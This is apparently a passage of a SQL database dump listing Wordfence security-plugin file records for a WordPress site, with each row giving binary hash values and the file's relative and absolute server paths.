('bÊ¥ñHzfW˜ …­gw›', 'wp-content/plugins/wordfence/lib/wfSchema.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfSchema.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'êi«ÉõR¹ gsäg€u', 'ò8û.lI’âãàHO±[‚w/³X}»y/ñ°ÿ’', '', 0, '?'),
('ÕõK2;æ<D¦®‡ƒkub', 'wp-content/plugins/wordfence/lib/wfStyle.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfStyle.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 's†»1_¸eþk2R’²žÉ', 'jÆé¢Ž·°È®_c×632¤3Ö…ã]Gs}.\n', '', 0, '?'),
('á´ôÚsk“6/§«Ð½º', 'wp-content/plugins/wordfence/lib/wfSupportController.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfSupportController.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Úéò(Ið”õV³MÃè', 'qõ¤5)ú2Û_{[XLÙå‚nI‹jß¿qw&šƒ5', '', 0, '?'),
('šêŠh‹L¼²JHÿX#0', 'wp-content/plugins/wordfence/lib/wfUnlockMsg.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfUnlockMsg.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Jõc)û¾ReàYßlä7üá', '.Ö`ŸiõWþ	t1ä}ëstyôÉªÜã³!K', '', 0, '?'),
('‰ªeÄ\\«Ô1átÆ‹Ü<	„', 'wp-content/plugins/wordfence/lib/wfUpdateCheck.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfUpdateCheck.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰¢	j¨hàŽÈ*D!|', '*6@OJhÎR&¢Ý¤¦Æ›£·KÊ§Qg›©Cî¡‡', '', 0, '?'),
('¨Q49ãóLzÓJµ', 'wp-content/plugins/wordfence/lib/wfUtils.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfUtils.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'â=ziÇ³4æHfÃˆë¡', '–º[BÍ–,\0 XFžþS8füú§oV•YŽ\reáO', '', 0, '?'),
('½@G„îtÇeY\\''>¯O', 'wp-content/plugins/wordfence/lib/wfVersionCheckController.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfVersionCheckController.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Š"4aàãÃ%½\nN®ßa', '·P-ù>ZÍÛm½š;Zþ‰Éêmk]p¹³µVàT>!', '', 0, '?'),
('³¶váÔTï¥ŠžÐCÊ', 'wp-content/plugins/wordfence/lib/wfVersionSupport.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfVersionSupport.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '´ßFnr£\r-Z&5gë', 'EÂÈ\nñØeªÙ“œg¹lbŸ"‡þƒ‡Œ£H9G', '', 0, '?'),
('åeÅÂúôüýn·…ŸAÛ', 'wp-content/plugins/wordfence/lib/wfView.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfView.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '[žÜºÑ-Ë†N\n™\\ÏnO', 'xáˆ2Q¿…íàmkÙ«@IFRhÕHu~ÂR8¨"zìK4Æ', '', 0, '?'),
('ªËÙv{C«ÀºÎÒ§€Ž4I', 'wp-content/plugins/wordfence/lib/wfViewResult.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfViewResult.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Z•¯¿ñ"J3ZÍÕw', 'ÊmÔ¶eå=žH‰ŽoDº©¿OTÝ\0ìv±è¯í', '', 0, '?'),
('i² CCù,¦+©ªíþ', 'wp-content/plugins/wordfence/lib/wfWebsite.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wfWebsite.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¢ÁtÌ~áAJÄao­', '¾A‰ölE÷ô¥T2	:ñ¼$“é‚éò¤&b’«', '', 0, '?'),
('ÇÝ¡=½½Nx¼‡KÔ`*', 'wp-content/plugins/wordfence/lib/wordfenceClass.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wordfenceClass.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ';Iîà·2G4¥¿EíAS', '™ I¹]ÍRÖß6~q;[Ô’f=·ØyÆåýèU\r–ù', '', 0, '?'),
('ÁkHmå1Óó`0Ñ¹¯–_', 'wp-content/plugins/wordfence/lib/wordfenceConstants.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wordfenceConstants.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×P(\róçÆŠ€S#\r', ';Ú¤ÝmE‡N:ØË÷eïfëïæ“Ñ1áÍc›ü\\#x', '', 0, '?'),
('ÕXùâÏà-Ÿ4¤Jü_ƒ3', 'wp-content/plugins/wordfence/lib/wordfenceHash.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wordfenceHash.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Üˆ"Õ=\nÀbc­Y¥wL', 'ÑuÉß3`è)d}jQåñqoØ	×îhÙß˜Ô¥!¹°ù|', '', 0, '?'),
('z˜|*6žS\\5·ã¯3', 'wp-content/plugins/wordfence/lib/wordfenceScanner.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wordfenceScanner.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\n¨°\04®BœÕ!†Å)t|', 'm£]ÓÑ;G&9JPs`ø-îîó—#Í_û½h†rK', '', 0, '?'),
('h»<²]“”ìOpNCÆ´æ', 'wp-content/plugins/wordfence/lib/wordfenceURLHoover.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/wordfenceURLHoover.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§ùÒ@¡žÍ Ê°8: œ', 'KKéMJÍÖiÛÃâµÙTQ.×9ê2=«ôèw1ñ|ä', '', 0, '?'),
('È6¿ì¡w¼¡Žr]Ïì*\\#', 'wp-content/plugins/wordfence/license.txt', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/license.txt', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '»ÓãB7¯&Ú]ÀŠNDd', 'Û@HÎßÁååM;ïº¾‰5 iÐÝ''™åoí¤5Vö', '', 0, '?'),
('JlšÆ¨1žÏã¥êç', 'wp-content/plugins/wordfence/models/.htaccess', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/models/.htaccess', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£E"xKÊê{Ç8ödS³', 'C‡¾ö½''r…9½ì@âK¡Þ†t¡ª™öâ§w#@kº', '', 0, '?'),
('ˆ`&%eF•gÀœ”ó”d', 'wp-content/plugins/wordfence/models/block/wfBlock.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/models/block/wfBlock.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ô=ôòîL@ÏÊAûÆ', '\nÕS‹Y>îlð*Ï¸C@z&+ z­dAW‘¬£w¤\n\r', '', 0, '?'),
('j²¦4-«O Õ„‚êrL\n', 'wp-content/plugins/wordfence/models/block/wfRateLimit.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/models/block/wfRateLimit.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¸À$1âD€''w³¬m€½ƒ', 'E&&\n·¯aÊîñ~Ùb+\Z Äá)jÇþÞMÓpŸ†M‰', '', 0, '?'),
('g¶]e…Ô!^…‹(PKðË', 'wp-content/plugins/wordfence/models/common/wfTab.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/models/common/wfTab.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '2öTÔ}šHW''<}\\', 'ZÂ¥|ÿséSÌ8e•Œ3è‹EØ—ª$‰ŒÖÆÜœ-hå', '', 0, '?'),
('XÆ~ÊVzl!_˜]/ž-3', 'wp-content/plugins/wordfence/models/firewall/wfFirewall.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/models/firewall/wfFirewall.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’XüÏC’Á#B·sTøb', 'Ã—GHìÎæÏ5kÓ¹rÂÜ°RR£Ç_£xÂ-¨', '', 0, '?'),
(' ÞÃ9˜X’¾¸¢U¨7¥z', 'wp-content/plugins/wordfence/models/page/wfPage.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/models/page/wfPage.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'tŠbo i›%HºXwÏXv', 'Æ…1hì/jwÕ<UÀ”\\™kÀq%s|W¬6éæ', '', 0, '?'),
('ŽîOÜŽ$8ª‡J¦e»‚', 'wp-content/plugins/wordfence/models/scanner/wfScanner.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/models/scanner/wfScanner.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '€Ýq½áÅ Šjk=Bï', 'o;ûvBÔT€æölª`8“KÎhü	GÆ‡R„ÿ', '', 0, '?'),
('š,:¿êô3ÀÕ¹üC@É~œ', 'wp-content/plugins/wordfence/modules/login-security/classes/.htaccess', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/.htaccess', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '…¼ÕA¾a¸bvrñ¤', 'C‡¾ö½''r…9½ì@âK¡Þ†t¡ª™öâ§w#@kº', '', 0, '?'),
('@ô={&À²Û¤}É_', 'wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '`^É¤=Œó§ûR@\0>¸œd', '}EÖË·‡N¬.@²Ž0 	ËàÇù§	ž²ôç', '', 0, '?'),
('¢´¸/Ï-•TÇ»úT<—S', 'wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '{žúÝ\\%Dk‡û¯wj', ']µúTSŸ .{˜£aáÞí©ÐM¬l·Ÿ¨Ž÷\0–§', '', 0, '?'),
('\ZO¸3F5K«;œ@ â', 'wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Î@õq\\ƒ}±«§—[õ', 'þ[ËTÅnŸEjdÝ(²$:!ÁhÔÎ\0›sè><', '', 0, '?'),
('‘@‡q°ÏGÍ-$¢©—ê|è', 'wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÖÊ_³wV-^+_§˜¸9>', '¼oŒ¿s/¬ðú‰}$ë©	_çxê\0ÔéÔu>¤', '', 0, '?'),
('p»¼\\*eê¶\n\rÏˆóëú®', 'wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"ècdØxÊW{f¥íŽNb', 'O°ºj+hÅ¤\nâµƒ8QÜ®#w¾Ë_pÊýC±ËÜû', '', 0, '?'),
('V¬ŒíÞrzÍ(¾nol*', 'wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'OU€ó0!Ñu°bG|‰Î', 'hí]Ú%¬¹”¦¶I è	¤ö´ÂI\0|Ü1ÕV~\n`', '', 0, '?'),
('S‡CÞ½i1Û­ jàù', 'wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÑÍ;ß—"Í\n…àšñ`…', '^™Q)7ÕÆ</EouOôŠŸˆDÏ·ýÆ>k·', '', 0, '?'),
('°{4´.„´’”£µ#˜#', 'wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"ÓVWKÞºT4ø0~v', '#tž¬ƒOÍ èîó˜æpÔR®®]ïÌ@jýè|', '', 0, '?'),
('È·ôÁ‚#/î–£\0œ·6', 'wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '2Aútz`àn%”ðYPÿ', 'Ÿµ·÷÷\\ƒ1ÉÓ[ùØZ†>EKöÆRkåØW\\‹vŽ', '', 0, '?'),
('â&þ	YÙtz(¡\Zøæ€', 'wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'éZ×}ÛRêØ.%…ßÆ¿', '§ÙQžä¥j¿§û¹T…§8ö''rF	5”åôcÑ0™Eø', '', 0, '?'),
('HÃøÜÍC©Tp(^ÞÙlí¼', 'wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'm’í¾/TÜ„‚RÝäú¶', 'KÎK''å6äcõ¶µ®®ç~Ä¯…¹Š,ß´æ¿úø', '', 0, '?'),
('¿ìL\Zã—Å|¨=šc™‰', 'wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'B0õ÷™šìou‘ÌŒÂ', 'Žœ‡ü7/QŒã¥åÆÕwÿg:Ä?¡À#{sþðÉŸú', '', 0, '?'),
('å…S	¯¶Æ¡g	N–d', 'wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '³›Ö!»Î<Ùd7ÜË¢iÐ', 'n2­§ÈJåÕì°«0Ôâ×3˜·Êvì°Î¶¢«Økˆ', '', 0, '?'),
('IÙÙ>çëºVáê]TTbWÄ', 'wp-content/plugins/wordfence/modules/login-security/classes/model/2fainitializationdata.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/2fainitializationdata.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Å[y×K8Ü9¼aü6Ah±', 'ŽIË6LA¦¯>6B”:%âÒí~?:qhÃ‰Ïãtcl', '', 0, '?'),
('Wx\Z§TaëØ7{ïË', 'wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£—˜1óü³½-»yS™kg', '4\Z¸ÝH+*PÅÜ`ˆ,æ±¹³êýÒ„|©*ûòÕŽp', '', 0, '?'),
('o1iðL5¸“Ïz®$·õ7', 'wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '»u1òÈ\\ÈÁ8‹‚;#j-', 'Pµ²ê„|±l“_‹ƒïZ…È3z<NÉ§KýßÎ', '', 0, '?'),
('ö%w45øX‚ßæ³ž', 'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 't¸°^I''Ü]!¯²Ò³ñ', 'ð…Ç¦ÖbtË5¡‹f·úªÅøcÒ¿kdþ¼m', '', 0, '?'),
('.´×7Ñfów9Pm@¥¦îÑ', 'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÏÏ0–Hç#ÿIHDñçó”', 'Ûv˜oÂVYx„?˜„ä\nÜÕ\n&3c-\r¬8îm¥¸', '', 0, '?'),
('w§@ÏI©eÆÜR²fù7ÙÅ', 'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¹›‚hŒR´€à¬', '§üö=ömHüÕ/¨\neÛýëC¦3Øu58‚', '', 0, '?'),
('t[[ö=ª6u7;YºžT¥', 'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '4s[•ÍçlAc4Áf¡¨ö', 'ÆºÌ>Êy×.~yK¾^¹)*f´°´‘6F·', '', 0, '?'),
('½\rzé@³_ÃýmødM', 'wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '96¿fºö®î;˜¡‡0', 'mgc%Ói\ZnƒA®€BŠ@ÀšwF±zÛ;çy`\rN', '', 0, '?'),
('ªrYýÿ\0­S²—Ä(z|«', 'wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'g8EQmvðOuòTO', '5‹9¹ÒTšêQ>|£šºÀ€_†ŒB¢dÃ¤é', '', 0, '?'),
('cÂ‹¥¸ºp	øPU3/Í', 'wp-content/plugins/wordfence/modules/login-security/classes/model/request.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/request.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '&Ü®Mª÷‹,~/âøér', 'F;ôôÌW]¬Ï&ñ¸åz~o''ð/€qÌ+¸¨', '', 0, '?'),
('ë±°ú6#|ÈãàÞtÄ¸', 'wp-content/plugins/wordfence/modules/login-security/classes/model/script.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/script.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ì/ÊàÞí+Þ£€ä', 'SÝ•þùË¢¬nð î$C¹³‡¸®új\ZD#´ÌÓ', '', 0, '?'),
('ô2p)´‹t¤­Iíî³', 'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' ŠïþÖ\0°">y>=À®£Ç', 'xVQ/}€ç¾:(3&þÑå¹%¢U‘¤JoªÿC', '', 0, '?'),
('Ç–š‰dÃ!s<X§ä™Ð¯', 'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ì*•1{,Ë¾òþ–Ê‚œÎ', '<•G²Æë$µU+ökÅL>\0h—ahB¦¬S©-Û', '', 0, '?'),
('-†šŽ_µµæmq+«÷1”', 'wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hã ²íÄÈi´e •É¡', 'IHøMp\\‡æõÿN­h\n×ˆNš¼F=-»“ºZØ=hO', '', 0, '?'),
('n0½<Pe™¦í“y\0.', 'wp-content/plugins/wordfence/modules/login-security/classes/model/style.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/style.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '+h·J­íNš3Š}õ{ª', '{Ö>Öß“v18g<]''ÈE¨#\\O¦­Ùãõ@ã¹Ãã', '', 0, '?'),
('™-6”Yw@½i®ë£Á=', 'wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÏOhæÙÚÅ€O<FÒ¬Æ', 'PŽJç¾H·¯ñt™Ns¿ûnd*Fˆ''WWÍaqýô]', '', 0, '?'),
('H¾)™ë†’×ÇjHÑj', 'wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '@ð±ÂËŠtrö£–Þu''', '#Ö_‰Ö\n:8aDÍÓØ r†Ùªœ·‡ß2/€ß˜ùñ', '', 0, '?'),
('Žg\Z»»\\Û\rž`=ƒm­', 'wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ']á‚#%þðZ	Ñ¦Ý	', 'PˆÊ;ŸX]IRâV^4Æ¢\n&ÞôïhìÔÍË±w', '', 0, '?'),
('U€.Õô½‘G\0ãÄh7K', 'wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Š÷{ÎÈÇ²ÙÙê²ŠæòT', 'sÁ×·my(å[¦~„úMŸÀ™®ËßNÓÔ˜óøé;i', '', 0, '?'),
('á¬;ÁDthòEÓGì>“H‰', 'wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÍÎ“õÿjN÷y¥Ã8', 'U™ÍAM¦V\nÉÃPWkŽxuû		¶Úûµ›Œ/ø=', '', 0, '?'),
('¦#:ÁöÌSk«U¹‚â{À', 'wp-content/plugins/wordfence/modules/login-security/classes/model/view.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/model/view.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '*Á:è?‘îl]¼¶ñçu', '2PæÖíƒš§Ð=w=‰7Ar§\nýfQúÂ~,·¯B', '', 0, '?'),
('Oñ*ž¿mË_)®8_3ˆ', 'wp-content/plugins/wordfence/modules/login-security/classes/utility/array.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/array.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '7¼.f+¦ {ùêïo', '[ëÈ5%ób¨ß+r4Ø¸ûž³‡i©7÷+Hþ"½B1ð', '', 0, '?'),
('ž±ß2’h6Í’¿\r¾~', 'wp-content/plugins/wordfence/modules/login-security/classes/utility/baseconversion.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/baseconversion.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷¹=Q«''®‹,Ãï\09—¬3', '|©ô‚"¤`!ÖCeŠl¸UåtÆ|#oùÿ«H$è', '', 0, '?'),
('„Y‰Ór~Ò€¢ˆ:¥â$ò!', 'wp-content/plugins/wordfence/modules/login-security/classes/utility/databaselock.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/databaselock.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '[{7DYhÐ§ámœf}¥\rf', '¶\nâÎ?\ra„°óØAL:, ={Lã5}¢ƒ+,«', '', 0, '?'),
('¡®ÎLC3v-¶n{é', 'wp-content/plugins/wordfence/modules/login-security/classes/utility/lock.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/lock.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„cüçüðìTGÓ8`;Ú', 'š2S`„±JÉ!®N,}.É§s0? ¥Òúô#x¦ô', '', 0, '?'),
('™èöäÁG°O,,óç©Ÿ', 'wp-content/plugins/wordfence/modules/login-security/classes/utility/measuredstring.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/measuredstring.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '!ÙñZ%8žý|eç-Bü', '«ŠebvTK§Ð-{éÝ	¹ÉëÂ<P·’ŸÁ)#¢', '', 0, '?'),
('‹Œœz#½[.oIdj', 'wp-content/plugins/wordfence/modules/login-security/classes/utility/multisite.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/multisite.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Þ(ë~³Ô\rr•\0²â.', '¢Ú„Ýg´cu¦4 ¹Ð:êo—W_Cñà	4:–¼1', '', 0, '?'),
('4œ¯³Ú®Rt(Á¡', 'wp-content/plugins/wordfence/modules/login-security/classes/utility/multisiteconfigurationextractor.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/multisiteconfigurationextractor.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Œ2­î''ó]@]e…k+‚ì', ' ¨Ïa¹ì)sëõžÂ©úCk#ü7±…f‡‹ß\Z”', '', 0, '?'),
('Éã…Ä?"èñ&-ìj»™û', 'wp-content/plugins/wordfence/modules/login-security/classes/utility/nulllock.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/nulllock.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ºÅ!æ€yNôÑœñûzð', 'Ôã¿Ý©ž\0ó $´\n·ÌÐo[„\\qñÍžrv"/Ê', '', 0, '?'),
('¸}¬ºšN\\9žÆ\\ÏÓä', 'wp-content/plugins/wordfence/modules/login-security/classes/utility/number.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/number.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' ,2—Pç¡ÄE©m', 'ë‡»9ó¢(T’Pû’#ßgïò\nµÙQ¿¢ ©‹k¢¹', '', 0, '?'),
('€¿%	›+Ûê³‚4û{:', 'wp-content/plugins/wordfence/modules/login-security/classes/utility/serialization.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/modules/login-security/classes/utility/serialization.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡o•Ñ•bYîR¹ò±ôÏ÷“', '©tiioP7,ˆR|­q–XåÒ)á†ŠÝÇ®fê@Kvá	', '', 0, '?'),
